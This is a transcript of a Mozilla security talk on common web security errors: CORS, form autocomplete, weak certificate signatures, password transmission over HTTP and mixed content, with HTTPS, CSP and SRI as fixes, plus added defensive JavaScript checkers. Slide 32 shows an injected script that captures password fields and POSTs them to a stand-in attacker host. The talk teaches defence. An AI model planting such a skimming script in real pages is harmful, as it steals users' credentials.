Slide 1

Fixing the Top 5 Web Security Errors We See from Firefox
Luke Crouch • Privacy + Security Engineer, Mozilla • @groovecoder

Slide 2

Me. I’m Luke Crouch. I work on Privacy & Security. I click thru slides really fast. Twitter: @groovecoder

Slide 3

The “Top 5”*

* MDN Google Analytics: pageviews in /en-US/docs/Web/Security from utm_medium=firefox-console-errors

Slide 4

05 Same-Origin Policy

Slide 5

No content

Slide 6

No content

Slide 7

Cross-Origin Request

Page at http://www.evilcorp.com:

    …
    new XMLHttpRequest().open("GET", "boss.bankofamerica.com/data.json");
    …

Slide 8

Cross-Origin Request Threats

Attacker
• Any malicious origin
• Phishing & malware sites
• Compromised CDNs
• Untrusted first parties

Attacks
• Steal data from other origins

Slide 9

“Fix”: All browsers enforce Same-Origin Policy

Slide 10

“Fix”: Use HTTP Access Control (CORS) to allow cross-origin access

Slide 11

HTTP Access Control (CORS)
https://developer.mozilla.org/en-US/docs/Web/HTTP/Access_control_CORS

Slide 12

HTTP Access Control (CORS)

Response from http://public.slidesharecdn.com/data.json:

    …
    Access-Control-Allow-Origin: www.slideshare.net
    …

Page at http://www.slideshare.net:

    …
    new XMLHttpRequest().open("GET", "public.slidesharecdn.com/data.json");
    …

https://developer.mozilla.org/en-US/docs/Web/HTTP/Access_control_CORS
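How the same-origin check and the CORS allow header fit together, as an added example that is not part of the slides. The origins, the allowlist and the three functions (isCrossOrigin, corsHeadersFor, responseReadable) are this editor's constructions for the demo, not browser or server code from the talk; note that an origin is a full scheme://host[:port], which is why the example allowlist carries the scheme.

```javascript
// Added example (not from the slides): how a server decides the
// Access-Control-Allow-Origin header, and how a browser decides whether a
// request is cross-origin in the first place. Both are pure functions so
// they can be exercised offline.

// Same-origin check: scheme, host and port must all match.
function isCrossOrigin(pageUrl, requestUrl) {
  const page = new URL(pageUrl);
  const req = new URL(requestUrl, pageUrl); // relative URLs resolve against the page
  return page.origin !== req.origin;
}

// Server side: echo back the requesting Origin only if it is on the allowlist.
// An origin is a full "scheme://host[:port]", so a bare "www.slideshare.net"
// would never match what the browser sends in the Origin header.
function corsHeadersFor(requestOrigin, allowedOrigins) {
  if (!requestOrigin || !allowedOrigins.includes(requestOrigin)) {
    return {}; // no CORS headers: the browser withholds the response body
  }
  return {
    "Access-Control-Allow-Origin": requestOrigin,
    // Vary tells caches that the response differs per Origin.
    "Vary": "Origin",
  };
}

// Browser side: may the page's script read the response body?
// "*" is accepted only for requests sent without credentials.
function responseReadable(pageOrigin, responseHeaders, withCredentials = false) {
  const acao = responseHeaders["Access-Control-Allow-Origin"];
  if (acao === "*") return !withCredentials;
  return acao === pageOrigin;
}

// Constructed allowlist, mirroring the two pages on the slides.
const ALLOWED = ["http://www.slideshare.net", "https://www.slideshare.net"];

function demo() {
  const evilHeaders = corsHeadersFor("http://www.evilcorp.com", ALLOWED);
  const goodHeaders = corsHeadersFor("http://www.slideshare.net", ALLOWED);
  return {
    evilIsCrossOrigin: isCrossOrigin("http://www.evilcorp.com/", "http://boss.bankofamerica.com/data.json"),
    evilCanRead: responseReadable("http://www.evilcorp.com", evilHeaders),
    slideshareCanRead: responseReadable("http://www.slideshare.net", goodHeaders),
  };
}

console.log(demo());
```

Without a matching Access-Control-Allow-Origin the request still reaches the server; what the browser withholds is the response, which is why the Same-Origin Policy alone does not protect against state-changing requests (that is CSRF territory, outside this talk).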

Slide 13

04 Form Autocompletion

Slide 14

I couldn’t find the specific errors, so, in general …

Slide 15

By default, browsers remember what users submit via input fields

Slide 16

Form Autocompletion

Slide 17

Form autocompletion

…
…

https://developer.mozilla.org/en-US/docs/Web/Security/Securing_your_site/Turning_off_form_autocompletion

Slide 18

Form auto-complete Threats

Attacker
• Malware authors
• Over-the-shoulder

Attacks
• Steal the data from a file
• Steal the data from the screen

Slide 19

Disabling for sensitive information

…
…

Disable for the entire form
Disable for 1 field*

https://developer.mozilla.org/en-US/docs/Web/Security/Securing_your_site/Turning_off_form_autocompletion

Slide 20

Caveat: login fields; browsers want to remember this

…

Has no effect; browser still offers to remember

https://developer.mozilla.org/en-US/docs/Web/Security/Securing_your_site/Turning_off_form_autocompletion
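As an added example (not from the slides or from MDN), a small lint over page HTML that reports sensitive inputs still open to autocompletion, applying the rules the slides describe: a field-level autocomplete attribute overrides the form's, and autocomplete="off" on a login field is ignored by the browser, so it is reported only as a note rather than as a fix. The function names, the SENSITIVE_NAME pattern and the sample form are this editor's constructions; the tag scanning is a minimal regex intended only for the sample, not a general HTML parser.

```javascript
// Added example (not from the slides): lint HTML source for <input> elements
// holding sensitive data that still allow autocompletion. Resolves the
// attribute the way browsers do: autocomplete on the <input> overrides
// autocomplete on its <form>. Regex-based scanning, adequate for the
// constructed sample below only.

// Field names treated as sensitive (constructed heuristic for the demo).
const SENSITIVE_NAME = /(card|cc[-_]?num|cvv|cvc|ssn|iban|account)/i;

// Parse name="value" / name='value' / name=value / bare attributes of one tag.
function parseAttrs(tagText) {
  const attrs = {};
  const body = tagText.replace(/^<\s*[a-zA-Z][\w-]*/, ""); // drop the tag name
  const re = /([^\s"'=<>\/]+)(?:\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s"'>]+)))?/g;
  let m;
  while ((m = re.exec(body)) !== null) {
    attrs[m[1].toLowerCase()] = m[2] ?? m[3] ?? m[4] ?? "";
  }
  return attrs;
}

// Returns one finding per sensitive input that is still autocompletable.
function lintAutocomplete(html) {
  const findings = [];
  const formRe = /<form\b[^>]*>([\s\S]*?)<\/form>/gi;
  let f;
  while ((f = formRe.exec(html)) !== null) {
    const formAttrs = parseAttrs(f[0].slice(0, f[0].indexOf(">") + 1));
    const inputRe = /<input\b[^>]*>/gi;
    let i;
    while ((i = inputRe.exec(f[1])) !== null) {
      const a = parseAttrs(i[0]);
      const type = (a.type || "text").toLowerCase();
      const name = a.name || a.id || "";
      const isPassword = type === "password";
      if (!isPassword && !SENSITIVE_NAME.test(name)) continue;
      // Field-level attribute wins; otherwise inherit the form's; default is "on".
      const effective = (a.autocomplete ?? formAttrs.autocomplete ?? "on").toLowerCase();
      if (isPassword) {
        // Caveat from the slides: autocomplete="off" does not stop the browser
        // offering to save a login, so this is advisory only.
        if (effective === "off") {
          findings.push({ field: name, level: "note", reason: "autocomplete=off is ignored for login fields" });
        }
        continue;
      }
      if (effective !== "off") {
        findings.push({ field: name, level: "warn", reason: `autocomplete is "${effective}"` });
      }
    }
  }
  return findings;
}

// Constructed sample: the payment form disabled autocompletion at form level
// but one field re-enables it; the login form relies on autocomplete="off".
const SAMPLE_HTML = `
<form id="pay" autocomplete="off">
  <input type="text" name="name">
  <input type="text" name="card-number">
  <input type="text" name="cvv" autocomplete="on">
</form>
<form id="login">
  <input type="text" name="user">
  <input type="password" name="pass" autocomplete="off">
</form>`;

console.log(lintAutocomplete(SAMPLE_HTML));
```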

Slide 21

03 Weak Signature Algorithms

Slide 22

No content

Slide 23

Weak Signature Algorithms Threats

Attacker
• Malicious host (with redirect or MITM vector)

Attacks
• Collision: fraudulent certificates
  • 2008 - MD5: RapidSSL, Microsoft
  • 2015 - SHA-1: “The SHAppening”

Slide 24

Weak Signature Algorithms

    $ openssl req -new -newkey rsa:2048 -nodes -sha1 \
        -out thecustomizewindows.com.csr \
        -keyout thecustomizewindows.com.key
    $ openssl req -in thecustomizewindows.com.csr -noout -text
    Certificate Request:
        …
        Signature Algorithm: sha1WithRSAEncryption
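An added check, not from the slides: read the text dump produced by openssl req -text (or openssl x509 -text) and flag requests or certificates signed with MD5 or SHA-1, the two families on the previous slide. The function names and the sample CSR text are constructed for this example; the "Signature Algorithm:" line format is what openssl prints.

```javascript
// Added example (not from the slides): audit openssl's text output for weak
// signature algorithms. The sample output below is constructed, shaped like
// the CSR dump on the slide.

// Digest families that browsers no longer accept for certificate signatures.
const WEAK_DIGESTS = ["md2", "md4", "md5", "sha1"];

// Pull every "Signature Algorithm: <name>" out of openssl's text dump.
// A certificate dump lists it twice (TBS part and trailer); a CSR once.
function signatureAlgorithms(opensslText) {
  const re = /Signature Algorithm:\s*([A-Za-z0-9_-]+)/g;
  const found = [];
  let m;
  while ((m = re.exec(opensslText)) !== null) found.push(m[1]);
  return found;
}

// Map an identifier such as "sha1WithRSAEncryption" or "ecdsa-with-SHA256"
// to its digest family and decide whether it is weak.
function classifySignature(algName) {
  const lower = algName.toLowerCase();
  const digestMatch = lower.match(/(md2|md4|md5|sha1|sha224|sha256|sha384|sha512)/);
  const digest = digestMatch ? digestMatch[1] : "unknown";
  return { algorithm: algName, digest, weak: WEAK_DIGESTS.includes(digest) };
}

// Audit a whole dump: returns the weak algorithm names found (empty = OK).
function weakSignaturesIn(opensslText) {
  return signatureAlgorithms(opensslText)
    .map(classifySignature)
    .filter((c) => c.weak)
    .map((c) => c.algorithm);
}

// Constructed sample CSR dump.
const SAMPLE_CSR_TEXT = `Certificate Request:
    Data:
        Version: 1 (0x0)
        Subject: CN = example.test
    Signature Algorithm: sha1WithRSAEncryption
         2a:11:...`;

console.log(weakSignaturesIn(SAMPLE_CSR_TEXT)); // ["sha1WithRSAEncryption"]
```

The fix on the openssl side is simply to request -sha256 instead of -sha1 when generating the CSR; the CA's own signature on the issued certificate is what the browser ultimately checks, so re-run the audit on the certificate it returns, not only on the request.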

Slide 25

Fixing weak signatures is the same as fixing …

Slide 26

02 Insecure Passwords (Transmission)

Slide 27

No content

Slide 28

No content

Slide 29

Insecure passwords

http://www.espn.com
…
…

Slide 30

Insecure passwords

https://www.espn.com
…
…

Slide 31

Insecure passwords

http://www.espn.com
…
…

THIS IS NOT SECURE!

Slide 32

Insecure passwords

http://www.espn.com

    // Injected via HTTP MitM
    [...document.querySelectorAll("[type='password']")].forEach(pwInput => {
      pwInput.addEventListener("change", () => {
        fetch("evilsite.com", {method: "POST", body: pwInput.value});
      });
    });
    …
    …

SEE, TOLD YOU SO!

Slide 33

Insecure password transmission Threats

Attacker
• Man-in-the-middle:
  • Open WiFi
  • ISP
  • Proxies

Attacks
• Steal password
  • + Password reuse

Slide 34

Fixing weak signatures and insecure passwords is the same as fixing …

Slide 35

01 Mixed Content

Slide 36

No content

Slide 37

Insecure active content

<script>, <link>, <iframe>, <object>, XMLHttpRequest, @font-face, cursor, background-image, etc.

Page at https://www.dailymotion.com/us:

    <html>
    …
    <script src="http://mc.dailymotion.com/masscast/2/dailymotion.us/home/76127265087">
    …

Slide 38

Insecure active content Threats

Attacker
• Man-in-the-middle:
  • Open WiFi
  • ISP
  • Proxies

Attacks
• Steal credentials
• Steal sensitive data from DOM
• Alter behavior of DOM
• Install malware

Slide 39

Browsers already fix insecure active content for you by blocking it

Slide 40

Insecure passive/display content

Slide 41

No content

Slide 42

Insecure passive/display content

<img>, <audio>, <video>

Page at https://www.booking.com/:

    …

Slide 43

Insecure passive/display content Threats

Attacker
• Man-in-the-middle:
  • Open WiFi
  • ISP
  • Proxies

Attacks
• Break page
• Snoop content
• Inject misleading content
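An added example, not from the slides: a classifier that walks a page's subresources and labels http: references on an https: page as active (blocked by browsers) or passive (loaded with a warning), using the element lists from slides 37 and 42. The hostnames, function names and sample page are constructed; the tag scanning is a minimal regex intended only for the sample, not a general HTML parser.

```javascript
// Added example (not from the slides): find mixed content in a page and say
// whether each hit is active (browser blocks it) or passive (browser loads
// it but drops the lock icon). Regex tag scan, adequate for the constructed
// sample below only.

// Element -> attribute that names the subresource, split by how browsers
// treat an http: fetch from an https: page.
const ACTIVE = { script: "src", link: "href", iframe: "src", object: "data" };
const PASSIVE = { img: "src", audio: "src", video: "src" };

function attrValue(tagText, attr) {
  const re = new RegExp(`\\b${attr}\\s*=\\s*(?:"([^"]*)"|'([^']*)'|([^\\s>]+))`, "i");
  const m = tagText.match(re);
  return m ? (m[1] ?? m[2] ?? m[3]) : null;
}

// Returns [{tag, url, kind}] for every subresource fetched over plain http
// from the given page. kind is "active" or "passive".
function findMixedContent(pageUrl, html) {
  const page = new URL(pageUrl);
  if (page.protocol !== "https:") return []; // mixed content only exists on https pages
  const results = [];
  const tagRe = /<([a-zA-Z]+)\b[^>]*>/g;
  let m;
  while ((m = tagRe.exec(html)) !== null) {
    const tag = m[1].toLowerCase();
    const kind = tag in ACTIVE ? "active" : tag in PASSIVE ? "passive" : null;
    if (!kind) continue;
    const raw = attrValue(m[0], ACTIVE[tag] || PASSIVE[tag]);
    if (!raw) continue;
    let url;
    try { url = new URL(raw, pageUrl); } catch { continue; }
    // Relative and protocol-relative ("//host/x") URLs inherit https: from the page.
    if (url.protocol === "http:") results.push({ tag, url: url.href, kind });
  }
  return results;
}

// What the browser does with each finding, per the slides.
function browserAction(finding) {
  return finding.kind === "active" ? "blocked" : "loaded with warning";
}

// Constructed sample page: one active hit, one passive hit, three safe references.
const SAMPLE_PAGE = `<html><head>
<link rel="stylesheet" href="http://cdn.example.test/site.css">
<script src="//cdn.example.test/app.js"></script>
</head><body>
<img src="http://img.example.test/logo.png">
<img src="/local.png">
<video src="https://media.example.test/clip.mp4"></video>
</body></html>`;

console.log(findMixedContent("https://www.example.test/", SAMPLE_PAGE)
  .map((f) => `${f.kind}: ${f.url} -> ${browserAction(f)}`));
```

The protocol-relative script in the sample is the cheap fix the deck builds up to: a "//host/path" reference follows the page's own scheme, so it stops being mixed content the moment the page moves to HTTPS.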

Slide 44

Snooping Session Cookies

Slide 45

Snooping Session Cookies

Slide 46

Snooping Session Cookies = Session Hijacking

Slide 47

Snooping Session Cookies = Session Hijacking

Slide 48

Snooping Session Cookies = Session Hijacking

Slide 49

Snooping Other Cookies

Slide 50

Snooping Other Cookies

Slide 51

Snooping Other Cookies

Slide 52

Sneak Peek: Cookie Syncing
https://freedom-to-tinker.com/blog/englehardt/the-hidden-perils-of-cookie-syncing/

Slide 53

Fixing weak signatures, insecure passwords, AND insecure content

Slide 54

HTTPS ALL THE THINGS!

Slide 55

No content

Slide 56

+

Slide 57

No content

Slide 58

No content

Slide 59

certbot + Let’s Encrypt

    brew install certbot
    sudo certbot certonly --manual --preferred-challenges dns

Slide 60

certbot + Let’s Encrypt

Slide 61

certbot + Let’s Encrypt

    Please deploy a DNS TXT record under the name
    _acme-challenge.www.codesy.io with the following value:

    CxYdvM…5WvXR0

    Once this is deployed, Press ENTER to continue

Slide 62

Deploy the TXT record to your DNS

Slide 63

certbot + Let’s Encrypt

    Please deploy a DNS TXT record under the name
    _acme-challenge.www.codesy.io with the following value:

    CxYdvM…5WvXR0

    Once this is deployed, Press ENTER to continue

Slide 64

Add signed cert to your site!

Slide 65

No content

Slide 66

No content

Slide 67

Yay! You secured your site!

Slide 68

But there’s legacy insecure content!
http://webappsec-test.info/~bhill2/DifferentTakeOnOE.html

Slide 69

Content-Security-Policy

Slide 70

Content-Security-Policy

    Content-Security-Policy: default-src https:;

Enforce https: for all src

https://developer.mozilla.org/en-US/docs/Web/HTTP/CSP

Slide 71

good: upgrade-insecure-requests

    Content-Security-Policy: default-src https:; upgrade-insecure-requests;

Change http links to https

https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Content-Security-Policy/upgrade-insecure-requests

Slide 72

upgrade-insecure-requests
http://webappsec-test.info/~bhill2/DifferentTakeOnOE.html

Slide 73

better: block-all-mixed-content

    Content-Security-Policy: block-all-mixed-content;

On https pages, block http requests

https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Content-Security-Policy/block-all-mixed-content

Slide 74

How do you know which content is insecure?

Slide 75

Content-Security-Policy-Report-Only

    Content-Security-Policy-Report-Only: default-src https:; block-all-mixed-content; report-uri https://groovecoder.report-uri.io/r/default/csp/reportOnly

Do not enforce; only report violations

https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Content-Security-Policy-Report-Only

Slide 76

Content-Security-Policy report-uri

    Content-Security-Policy-Report-Only: default-src https:; block-all-mixed-content; report-uri https://groovecoder.report-uri.io/r/default/csp/reportOnly

Report violations here

https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Content-Security-Policy/report-uri

Slide 77

report-uri.io
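An added example, not from the slides or from report-uri.io: parsing a CSP header into its directives, emitting the Report-Only and enforcing variants of the same policy (the rollout order slides 70 to 76 describe), and triaging one violation report in the JSON shape browsers POST to the report-uri endpoint so that mixed-content hits can be singled out. The endpoint URL, hostnames, function names and the report body are constructed.

```javascript
// Added example (not from the slides): CSP header parsing/building plus
// triage of a report-uri violation report. The report below is constructed
// in the "csp-report" envelope browsers send.

// "default-src https:; block-all-mixed-content; report-uri https://x/r"
// -> { "default-src": ["https:"], "block-all-mixed-content": [], "report-uri": ["https://x/r"] }
function parseCsp(header) {
  const directives = {};
  for (const part of header.split(";")) {
    const tokens = part.trim().split(/\s+/).filter(Boolean);
    if (tokens.length === 0) continue;
    directives[tokens[0].toLowerCase()] = tokens.slice(1);
  }
  return directives;
}

// Build both header variants from one directive map: ship the Report-Only
// header first, watch the reports, then move the same policy to enforcement.
function cspHeaders(directives, reportEndpoint) {
  const body = Object.entries(directives)
    .map(([name, values]) => [name, ...values].join(" "))
    .join("; ");
  const withReport = `${body}; report-uri ${reportEndpoint}`;
  return {
    reportOnly: `Content-Security-Policy-Report-Only: ${withReport}`,
    enforce: `Content-Security-Policy: ${withReport}`,
  };
}

// Summarise one violation report. Mixed content shows up as a blocked http:
// URL on an https: document; anything else is some other policy violation.
function triageReport(reportJson) {
  const r = JSON.parse(reportJson)["csp-report"];
  if (!r) throw new Error("not a CSP report");
  const doc = new URL(r["document-uri"]);
  const blocked = r["blocked-uri"] || "";
  return {
    document: doc.href,
    blocked,
    directive: r["effective-directive"] || r["violated-directive"],
    mixedContent: doc.protocol === "https:" && blocked.startsWith("http:"),
  };
}

// Constructed sample report, as a browser would POST it to the report-uri.
const SAMPLE_REPORT = JSON.stringify({
  "csp-report": {
    "document-uri": "https://www.example.test/home",
    "referrer": "",
    "violated-directive": "img-src",
    "effective-directive": "img-src",
    "original-policy": "default-src https:; block-all-mixed-content; report-uri https://reports.example.test/csp",
    "blocked-uri": "http://img.example.test/logo.png",
    "status-code": 0,
  },
});

console.log(parseCsp("default-src https:; block-all-mixed-content;"));
console.log(cspHeaders({ "default-src": ["https:"], "block-all-mixed-content": [] }, "https://reports.example.test/csp"));
console.log(triageReport(SAMPLE_REPORT));
```

Reports arrive from end users' browsers, so treat the endpoint as untrusted input: validate the JSON and the URLs before storing them, and expect noise from extensions and proxies alongside the real mixed-content hits.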

Slide 78

What if you have to use insecure resources?

Slide 79

Sub-Resource Integrity

Slide 80

Subresource Integrity (SRI)

Page at https://example.com:

    …
    …

https://developer.mozilla.org/en-US/docs/Web/Security/Subresource_Integrity

Callouts: Hash algorithm | Hash digest

Slide 81

What if resources add their own <script> or <style> elements?

Slide 82

require-sri-for

    Content-Security-Policy-Report-Only: require-sri-for script style; report-uri https://groovecoder.report-uri.io/r/default/csp/reportOnly

Require SRI attributes on all <script> and <style> elements

https://developer.mozilla.org/en-US/docs/Web/HTTP/CSP

Slide 83

But, yeah … HTTPS ALL THE THINGS!

Slide 84

+

Slide 85

Thanks.
Luke Crouch
Twitter: @groovecoder
groovecoder.com